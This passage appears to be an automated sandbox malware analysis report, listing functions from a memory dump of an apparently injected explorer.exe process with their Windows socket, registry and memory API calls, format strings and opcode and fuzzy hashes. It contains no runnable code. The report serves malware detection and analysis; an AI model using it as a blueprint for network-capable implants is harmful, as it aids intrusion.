                                                          • Associated: 0000000E.00000002.3814420381.0000000002F95000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002FC1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002FC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815491913.0000000002FC8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.0000000002FCA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.0000000003356000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.000000000335E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.000000000336D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3824350788.000000000336E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2f50000_explorer.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _fileno$_errno$_invalid_parameter_noinfo
                                                          • String ID:
                                                          • API String ID: 482796045-0
                                                          • Opcode ID: 5d34ed3c74e4fc54becda7c4f507b6c8f71872e51e63e7dcdcd9020a15ad3c0f
                                                          • Instruction ID: a59f82665856a9379d230431e01b361c3604b4e101d7014f417399e10b71d054
                                                          • Opcode Fuzzy Hash: 5d34ed3c74e4fc54becda7c4f507b6c8f71872e51e63e7dcdcd9020a15ad3c0f
                                                          • Instruction Fuzzy Hash: AE51F52371498285CB24BF3999942BFB3A2EB42BE87544712DB7E4B7E0DF28D4538704
                                                          Function 02F76620 Relevance: 16.7, APIs: 11, Instructions: 228timeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • Concurrency::details::platform::__ChangeTimerQueueTimer.LIBCMTD ref: 02F7665F
                                                            • Part of subcall function 02F74D40: send.WS2_32 ref: 02F74D6C
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3814420381.0000000002F51000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F50000, based on PE: true
                                                          • Associated: 0000000E.00000002.3814386711.0000000002F50000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002F95000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002FC1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002FC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815491913.0000000002FC8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.0000000002FCA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.0000000003356000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.000000000335E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.000000000336D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3824350788.000000000336E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2f50000_explorer.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Timer$ChangeConcurrency::details::platform::__Queuesend
                                                          • String ID:
                                                          • API String ID: 1596855159-0
                                                          • Opcode ID: 2ecc7203e8acfedafd9593a6d32f009ae4103638e6d19cc8ece92d7067b5796f
                                                          • Instruction ID: c254add469f78ee23249445ecc076c47e29b994694bf6bf704b3d92fe072fcca
                                                          • Opcode Fuzzy Hash: 2ecc7203e8acfedafd9593a6d32f009ae4103638e6d19cc8ece92d7067b5796f
                                                          • Instruction Fuzzy Hash: B8C1E476608BC4CAD771CF19E5847AAB7A5F7C8784F00812ADB8A87B58DB79C485CF01
                                                          Function 02F74AF0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 93synchronizationthreadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3814420381.0000000002F51000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F50000, based on PE: true
                                                          • Associated: 0000000E.00000002.3814386711.0000000002F50000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002F95000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002FC1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002FC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815491913.0000000002FC8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.0000000002FCA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.0000000003356000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.000000000335E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.000000000336D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3824350788.000000000336E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2f50000_explorer.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseHandle$CreateEventObjectResumeSingleThreadWait
                                                          • String ID: d
                                                          • API String ID: 2620549756-2564639436
                                                          • Opcode ID: d3d16f9412d9debcb6f677f8a072c3125f389ce9751816d81d61c4d42323ff7b
                                                          • Instruction ID: c4146aab650a6f166bd1213506d706331175c2937bf1d33dfd73ddfe7d871131
                                                          • Opcode Fuzzy Hash: d3d16f9412d9debcb6f677f8a072c3125f389ce9751816d81d61c4d42323ff7b
                                                          • Instruction Fuzzy Hash: 2A419336618B8482DB14CB19F49832AB7B0F7C5B94F204526EB8E47B68CF7DC895CB40
                                                          Function 02F828BC Relevance: 12.1, APIs: 8, Instructions: 125COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3814420381.0000000002F51000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F50000, based on PE: true
                                                          • Associated: 0000000E.00000002.3814386711.0000000002F50000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002F95000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002FC1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002FC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815491913.0000000002FC8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.0000000002FCA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.0000000003356000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.000000000335E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.000000000336D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3824350788.000000000336E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2f50000_explorer.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _errno$_invalid_parameter_noinfo
                                                          • String ID:
                                                          • API String ID: 2819658684-0
                                                          • Opcode ID: 84b4647cddfcc60c1b96831943584abfa7b557354964ef594d5bb2a71bf54ccb
                                                          • Instruction ID: 03a8e2d116f43378a76f465ff2f358559412ba449afc41b8dba49d33888168a2
                                                          • Opcode Fuzzy Hash: 84b4647cddfcc60c1b96831943584abfa7b557354964ef594d5bb2a71bf54ccb
                                                          • Instruction Fuzzy Hash: 8441E772B017C18EEF25AF65C9503BCB671BB55BE8F188222CF9907A98DB389042D711
                                                          Function 02F75CD0 Relevance: 10.6, APIs: 7, Instructions: 100timememorynetworkCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • LocalAlloc.KERNEL32 ref: 02F75D32
                                                          • htons.WS2_32 ref: 02F75D5F
                                                            • Part of subcall function 02F75FB0: WSACreateEvent.WS2_32 ref: 02F75FC8
                                                            • Part of subcall function 02F75FB0: WSAEventSelect.WS2_32 ref: 02F75FEF
                                                            • Part of subcall function 02F75FB0: WSAWaitForMultipleEvents.WS2_32 ref: 02F76044
                                                            • Part of subcall function 02F75FB0: WSACloseEvent.WS2_32 ref: 02F76053
                                                          • Concurrency::details::platform::__ChangeTimerQueueTimer.LIBCMTD ref: 02F75DD8
                                                            • Part of subcall function 02F74D40: send.WS2_32 ref: 02F74D6C
                                                            • Part of subcall function 02F75E90: WSACreateEvent.WS2_32 ref: 02F75EA8
                                                            • Part of subcall function 02F75E90: WSAEventSelect.WS2_32 ref: 02F75ECF
                                                            • Part of subcall function 02F75E90: WSAWaitForMultipleEvents.WS2_32 ref: 02F75F24
                                                            • Part of subcall function 02F75E90: WSACloseEvent.WS2_32 ref: 02F75F33
                                                          • Concurrency::details::platform::__ChangeTimerQueueTimer.LIBCMTD ref: 02F75E1B
                                                            • Part of subcall function 02F74D00: recv.WS2_32 ref: 02F74D2C
                                                          • und_memcpy.LIBCMTD ref: 02F75E59
                                                          • LocalFree.KERNEL32 ref: 02F75E63
                                                          • LocalFree.KERNEL32 ref: 02F75E72
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3814420381.0000000002F51000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F50000, based on PE: true
                                                          • Associated: 0000000E.00000002.3814386711.0000000002F50000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002F95000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002FC1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002FC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815491913.0000000002FC8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.0000000002FCA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.0000000003356000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.000000000335E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.000000000336D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3824350788.000000000336E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2f50000_explorer.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Event$Timer$Local$ChangeCloseConcurrency::details::platform::__CreateEventsFreeMultipleQueueSelectWait$Allochtonsrecvsendund_memcpy
                                                          • String ID:
                                                          • API String ID: 2815282806-0
                                                          • Opcode ID: 4eb895bf869de8aa215208fbdcdd895fb812ccbd795ecf5bc9e5fab246290e51
                                                          • Instruction ID: fb51713f23f43ad6c705d14d28317d679a707bac88d9039e37be412a4c6b2137
                                                          • Opcode Fuzzy Hash: 4eb895bf869de8aa215208fbdcdd895fb812ccbd795ecf5bc9e5fab246290e51
                                                          • Instruction Fuzzy Hash: 4341B376618B8486CB509B1AE49471EBBB1F7CABD0F609416EF8D47B29CB3DC4958F00
                                                          Function 02F75B40 Relevance: 10.6, APIs: 7, Instructions: 92timememorynetworkCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • LocalAlloc.KERNEL32 ref: 02F75BA0
                                                          • htons.WS2_32 ref: 02F75BCD
                                                            • Part of subcall function 02F75FB0: WSACreateEvent.WS2_32 ref: 02F75FC8
                                                            • Part of subcall function 02F75FB0: WSAEventSelect.WS2_32 ref: 02F75FEF
                                                            • Part of subcall function 02F75FB0: WSAWaitForMultipleEvents.WS2_32 ref: 02F76044
                                                            • Part of subcall function 02F75FB0: WSACloseEvent.WS2_32 ref: 02F76053
                                                          • Concurrency::details::platform::__ChangeTimerQueueTimer.LIBCMTD ref: 02F75C20
                                                            • Part of subcall function 02F74D40: send.WS2_32 ref: 02F74D6C
                                                            • Part of subcall function 02F75E90: WSACreateEvent.WS2_32 ref: 02F75EA8
                                                            • Part of subcall function 02F75E90: WSAEventSelect.WS2_32 ref: 02F75ECF
                                                            • Part of subcall function 02F75E90: WSAWaitForMultipleEvents.WS2_32 ref: 02F75F24
                                                            • Part of subcall function 02F75E90: WSACloseEvent.WS2_32 ref: 02F75F33
                                                          • Concurrency::details::platform::__ChangeTimerQueueTimer.LIBCMTD ref: 02F75C65
                                                            • Part of subcall function 02F74D00: recv.WS2_32 ref: 02F74D2C
                                                          • und_memcpy.LIBCMTD ref: 02F75CA3
                                                          • LocalFree.KERNEL32 ref: 02F75CAD
                                                          • LocalFree.KERNEL32 ref: 02F75CBC
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3814420381.0000000002F51000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F50000, based on PE: true
                                                          • Associated: 0000000E.00000002.3814386711.0000000002F50000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002F95000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002FC1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002FC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815491913.0000000002FC8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.0000000002FCA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.0000000003356000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.000000000335E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.000000000336D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3824350788.000000000336E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2f50000_explorer.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Event$Timer$Local$ChangeCloseConcurrency::details::platform::__CreateEventsFreeMultipleQueueSelectWait$Allochtonsrecvsendund_memcpy
                                                          • String ID:
                                                          • API String ID: 2815282806-0
                                                          • Opcode ID: 6d1584e27863e11eecccec31ffe4d92e5a631787f7257fd950c5a147af9f6316
                                                          • Instruction ID: 8f0bb5606af08470243688153a86c2bf46fad31a1a04c96c2f64d0e0b3ae190b
                                                          • Opcode Fuzzy Hash: 6d1584e27863e11eecccec31ffe4d92e5a631787f7257fd950c5a147af9f6316
                                                          • Instruction Fuzzy Hash: F2419676618A9486CB50DB2AE49171ABBB1F7C9BD0F605016EF8E47B68CB3EC445CF00
                                                          Function 02F810E0 Relevance: 10.6, APIs: 7, Instructions: 67COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3814420381.0000000002F51000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F50000, based on PE: true
                                                          • Associated: 0000000E.00000002.3814386711.0000000002F50000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002F95000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002FC1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002FC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815491913.0000000002FC8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.0000000002FCA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.0000000003356000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.000000000335E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.000000000336D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3824350788.000000000336E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2f50000_explorer.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __doserrno_errno
                                                          • String ID:
                                                          • API String ID: 921712934-0
                                                          • Opcode ID: 5c6edd9b13529751f3dea23086ed4ae990fb3353bd24ccbaee78c292adf0ad87
                                                          • Instruction ID: 775d05e3c745a312b55f73d0a810058e64bc7262ee2d9e52da86d86f1367925e
                                                          • Opcode Fuzzy Hash: 5c6edd9b13529751f3dea23086ed4ae990fb3353bd24ccbaee78c292adf0ad87
                                                          • Instruction Fuzzy Hash: 2E11E42231094845EA067FA5ED5437EB626A790FF5F494717DF391B3D0CB788442CB60
                                                          Function 02F81924 Relevance: 10.6, APIs: 7, Instructions: 67COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3814420381.0000000002F51000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F50000, based on PE: true
                                                          • Associated: 0000000E.00000002.3814386711.0000000002F50000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002F95000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002FC1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002FC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815491913.0000000002FC8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.0000000002FCA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.0000000003356000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.000000000335E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.000000000336D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3824350788.000000000336E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2f50000_explorer.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __doserrno_errno
                                                          • String ID:
                                                          • API String ID: 921712934-0
                                                          • Opcode ID: d574cd3934c07f8b2f60bd93a24ec8070369997878e34e866a9726b187f580fb
                                                          • Instruction ID: 68839461954436428e85ca1bf582058c94ddddf21dc27c325232e3584c0f67c6
                                                          • Opcode Fuzzy Hash: d574cd3934c07f8b2f60bd93a24ec8070369997878e34e866a9726b187f580fb
                                                          • Instruction Fuzzy Hash: 5511D63271454846D7067FA5ED6077FB662A7A0BE1F494317DF19073D1DBB88442CB60
                                                          Function 02F62AB0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3814420381.0000000002F51000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F50000, based on PE: true
                                                          • Associated: 0000000E.00000002.3814386711.0000000002F50000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002F95000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002FC1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002FC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815491913.0000000002FC8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.0000000002FCA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.0000000003356000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.000000000335E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.000000000336D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3824350788.000000000336E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2f50000_explorer.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FreeTask$AllocFolderKnownLocalPathwnsprintf
                                                          • String ID: %s\%s
                                                          • API String ID: 294551330-4073750446
                                                          • Opcode ID: 1c920533cba50d50a10758bde22929d596c08ddf087f3b848bfd04640d3405b0
                                                          • Instruction ID: afdf3eedb4c6bacc2ba9cdbd21e1de838925bc309ede94f93ec021fe60f04ada
                                                          • Opcode Fuzzy Hash: 1c920533cba50d50a10758bde22929d596c08ddf087f3b848bfd04640d3405b0
                                                          • Instruction Fuzzy Hash: E011EC61624A8682D750DF65E8A876AA7B0FBC47D4F505031FA8E87B38DF3CC4568B00
                                                          Function 02F5BFB0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56registrymemoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 02F79E0C: _errno.LIBCMT ref: 02F79E43
                                                            • Part of subcall function 02F79E0C: _invalid_parameter_noinfo.LIBCMT ref: 02F79E4E
                                                          • RegGetValueW.ADVAPI32 ref: 02F5C038
                                                          • LocalAlloc.KERNEL32 ref: 02F5C051
                                                          • RegGetValueW.ADVAPI32 ref: 02F5C0A4
                                                          • LocalFree.KERNEL32 ref: 02F5C0C8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3814420381.0000000002F51000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F50000, based on PE: true
                                                          • Associated: 0000000E.00000002.3814386711.0000000002F50000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002F95000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002FC1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002FC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815491913.0000000002FC8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.0000000002FCA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.0000000003356000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.000000000335E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.000000000336D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3824350788.000000000336E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2f50000_explorer.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: LocalValue$AllocFree_errno_invalid_parameter_noinfo
                                                          • String ID: SOFTWARE\%s
                                                          • API String ID: 2638254995-297323700
                                                          • Opcode ID: c74fbce8fb673395f1a4966b9197e44d30421ed9b3709ceedaa9f44b7f5bac03
                                                          • Instruction ID: ae9eacad2f8954fae59a6b8602ff517518008509cb0d7c816c591fad01c5e8db
                                                          • Opcode Fuzzy Hash: c74fbce8fb673395f1a4966b9197e44d30421ed9b3709ceedaa9f44b7f5bac03
                                                          • Instruction Fuzzy Hash: 3A21C732608B8082E7209B55F49475AB7B0FB85B94F600225EB9D47BA8DFBEC554CB44
                                                          Function 02F722F0 Relevance: 7.7, APIs: 5, Instructions: 152COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3814420381.0000000002F51000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F50000, based on PE: true
                                                          • Associated: 0000000E.00000002.3814386711.0000000002F50000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002F95000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002FC1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002FC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815491913.0000000002FC8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.0000000002FCA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.0000000003356000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.000000000335E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.000000000336D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3824350788.000000000336E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2f50000_explorer.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: und_memcpy
                                                          • String ID:
                                                          • API String ID: 2264155635-0
                                                          • Opcode ID: a121b2b6f9ce36e223bdba652a0c32e67d6159f597515279c2dcba07f5b18a59
                                                          • Instruction ID: 3373719ce127decb583113709c30fefb9fa8b8786e0f18dbd2456b7e5075f28a
                                                          • Opcode Fuzzy Hash: a121b2b6f9ce36e223bdba652a0c32e67d6159f597515279c2dcba07f5b18a59
                                                          • Instruction Fuzzy Hash: F3719F767096C09ADBB0CB19E4A07ABB7A1E7C9784F508026DB8987B58DF3DD5818F40
                                                          Function 02F844B0 Relevance: 7.6, APIs: 5, Instructions: 116COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • _fileno.LIBCMT ref: 02F844CB
                                                            • Part of subcall function 02F81CCC: _errno.LIBCMT ref: 02F81CD5
                                                            • Part of subcall function 02F81CCC: _invalid_parameter_noinfo.LIBCMT ref: 02F81CE0
                                                          • _errno.LIBCMT ref: 02F844DB
                                                          • _errno.LIBCMT ref: 02F844F9
                                                          • _isatty.LIBCMT ref: 02F8455A
                                                          • _getbuf.LIBCMT ref: 02F84566
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3814420381.0000000002F51000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F50000, based on PE: true
                                                          • Associated: 0000000E.00000002.3814386711.0000000002F50000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002F95000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002FC1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002FC6000.00000040.00001000.00020000.00000000.sdmpDownload File
